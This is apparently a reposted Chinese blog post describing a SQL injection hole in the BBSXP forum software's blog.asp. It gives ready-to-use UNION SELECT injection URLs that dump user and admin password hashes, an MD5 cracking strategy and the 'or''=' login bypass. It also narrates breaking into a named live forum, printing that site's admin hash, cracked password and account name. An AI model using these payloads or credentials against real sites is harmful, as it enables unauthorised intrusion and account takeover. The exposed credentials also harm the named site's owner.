BBSXP最新漏洞 简单注入检測 万能password

BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本号:眼下全部BBSXP
漏洞利用:
查前台password注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台password注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5


首先打开www.google.com在输入Po......bBsxp5.15有非常多这种论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀究竟,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 能够让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5password就显示出来了。 
前台password也能够出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的站点要倒下了 
接下来就是讲工具了,准备好MD5password破解器 
关于md5的破解,比較好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。非常快。 
2。假设不行,用小写字母跑。选择5-6位比較好。 
3。再不行,说明password可能使字母加数字,能够碰碰运气。能够配置一个精品自典,比方10G的, 
   跑上及几个小时。(你的机器配置必须非常好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台password..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台password... 
直接吧前台md5password暴出来。 
剩下的事就事破解md5了。 
如今開始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前台的password和后台一样,假设有2个加密password那就是代表1个是前台的一个是后台的,不多说了,看操作 
依照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,password是82246124,登入,,他的帐号是wzwu,password82246124,登入成功,后台登入,password82246124,登入成功,以下的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576


名'or''='password也是'or''='
 '
一般ASP系统都有相似以下的URL:http://www.xxx.com/xxx.ASP?ID=××,我们仅仅往在这种URL后加上一个单引號,假设返回server错误信息,那么就说明了程序并没有过滤单引號,并且从返回的错误信息中的了能够得到server的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
      and 1=1、http:/www.xxx.com/xx.asp?id=×× and
      1=2,假设返回的页面不一样,说明页面能够注入。

原文地址:https://www.cnblogs.com/hrhguanli/p/3965064.html